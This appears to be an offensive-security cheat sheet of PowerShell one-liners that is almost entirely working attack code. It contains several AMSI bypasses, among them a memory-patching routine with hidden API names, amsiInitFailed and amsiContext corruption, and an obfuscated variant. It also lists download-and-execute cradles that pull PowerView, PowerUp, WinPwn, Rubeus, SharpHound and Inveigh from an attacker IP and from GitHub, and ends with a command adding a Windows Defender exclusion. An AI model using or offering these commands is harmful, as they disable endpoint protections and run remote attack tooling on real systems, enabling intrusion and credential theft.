AMSI bypass
Best and currently working:
param($InitialStart=0x50000,$NegativeOffset=0x50000,$MaxOffset=0x1000000,$ReadBytes=0x50000);$APIs='using System;using System.ComponentModel;using System.Management.Automation;using System.Reflection;using System.Runtime.CompilerServices;using System.Runtime.InteropServices;using System.Text;public class APIs {[DllImport("kernel32.dll")]public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, UInt32 nSize, ref UInt32 lpNumberOfBytesRead);[DllImport("kernel32.dll")]public static extern IntPtr GetCurrentProcess();[DllImport("kernel32", CharSet=CharSet.Ansi, ExactSpelling=true, SetLastError=true)]public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);[DllImport("kernel32.dll", CharSet=CharSet.Auto)]public static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.LPWStr)] string lpModuleName);[MethodImpl(MethodImplOptions.NoOptimization | MethodImplOptions.NoInlining)]public static int Dummy() {return 1;}}';Add-Type $APIs;$InitialDate=Get-Date;$string='hello, world';$string=$string.replace('he','a');$string=$string.replace('ll','m');$string=$string.replace('o,','s');$string=$string.replace(' ','i');$string=$string.replace('wo','.d');$string=$string.replace('rld','ll');$string2='hello, world';$string2=$string2.replace('he','A');$string2=$string2.replace('ll','m');$string2=$string2.replace('o,','s');$string2=$string2.replace(' ','i');$string2=$string2.replace('wo','Sc');$string2=$string2.replace('rld','an');$string3='hello, world';$string3=$string3.replace('hello','Bu');$string3=$string3.replace(', ','ff');$string3=$string3.replace('world','er');$Address=[APIS]::GetModuleHandle($string);[IntPtr]$funcAddr=[APIS]::GetProcAddress($Address,$string2+$string3);$Assemblies=[appdomain]::currentdomain.getassemblies();$Assemblies|ForEach-Object{if($_.Location-ne $null){$split1=$_.FullName.Split(",")[0];If($split1.StartsWith('S')-And $split1.EndsWith('n')-And $split1.Length-eq 28){$Types=$_.GetTypes()}}};$Types|ForEach-Object{if($_.Name-ne $null){If($_.Name.StartsWith('A')-And $_.Name.EndsWith('s')-And $_.Name.Length-eq 9){$Methods=$_.GetMethods([System.Reflection.BindingFlags]'Static,NonPublic')}}};$Methods|ForEach-Object{if($_.Name-ne $null){If($_.Name.StartsWith('S')-And $_.Name.EndsWith('t')-And $_.Name.Length-eq 11){$MethodFound=$_}}};[IntPtr]$MethodPointer=$MethodFound.MethodHandle.GetFunctionPointer();[IntPtr]$Handle=[APIs]::GetCurrentProcess();$dummy=0;$ApiReturn=$false;:initialloop for($j=$InitialStart;$j-lt $MaxOffset;$j+=$NegativeOffset){[IntPtr]$MethodPointerToSearch=[Int64]$MethodPointer-$j;$ReadedMemoryArray=[byte[]]::new($ReadBytes);$ApiReturn=[APIs]::ReadProcessMemory($Handle,$MethodPointerToSearch,$ReadedMemoryArray,$ReadBytes,[ref]$dummy);for($i=0;$i-lt $ReadedMemoryArray.Length;$i+=1){$bytes=[byte[]]($ReadedMemoryArray[$i],$ReadedMemoryArray[$i+1],$ReadedMemoryArray[$i+2],$ReadedMemoryArray[$i+3],$ReadedMemoryArray[$i+4],$ReadedMemoryArray[$i+5],$ReadedMemoryArray[$i+6],$ReadedMemoryArray[$i+7]);[IntPtr]$PointerToCompare=[bitconverter]::ToInt64($bytes,0);if($PointerToCompare-eq $funcAddr){Write-Host "Found @ $($j) : $($i)!";[IntPtr]$MemoryToPatch=[Int64]$MethodPointerToSearch+$i;break initialloop}}};[IntPtr]$DummyPointer=[APIs].GetMethod('Dummy').MethodHandle.GetFunctionPointer();$buf=[IntPtr[]]($DummyPointer);[System.Runtime.InteropServices.Marshal]::Copy($buf,0,$MemoryToPatch,1);$FinishDate=Get-Date;$TimeElapsed=($FinishDate-$InitialDate).TotalSeconds;Write-Host "$TimeElapsed seconds"$xx = [Ref].Assembly.GetTypes(); Foreach($yy in $xx) {if ($yy.Name -like "*iUtils") {$vv = $yy}}; $ww = $vv.GetFields("NonPublic,Static"); Foreach ($uu in $ww) { if ($uu.Name -like "*nitFailed") {$ux = $uu}}; $ux.SetValue($null,$true)Corrupt Context Address Check:
1$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null); [IntPtr]$ptr=$g; [Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)Corrupt Initialization
1$a = [Ref].Assembly.GetTypes(); Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c = $b}}; $d = $c.GetFields("NonPublic,Static"); Foreach ($e in $d) { if ($e.Name -like "*nitFailed") {$f = $e}}; $f.SetValue($null,$true)1sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )PowerShell in memory injection:
(new-object system.net.webclient).downloadstring('http://10.10.15.194/PowerView.ps1') | IEX
IEX(new-object system.net.webclient).downloadstring('http://10.10.15.194/PowerView.ps1')iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1')
iex(new-object net.webclient).downloadstring('https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1')Defender Exclusion:
Add-MpPreference -ExclusionPath C:\windows\tasksLast updated
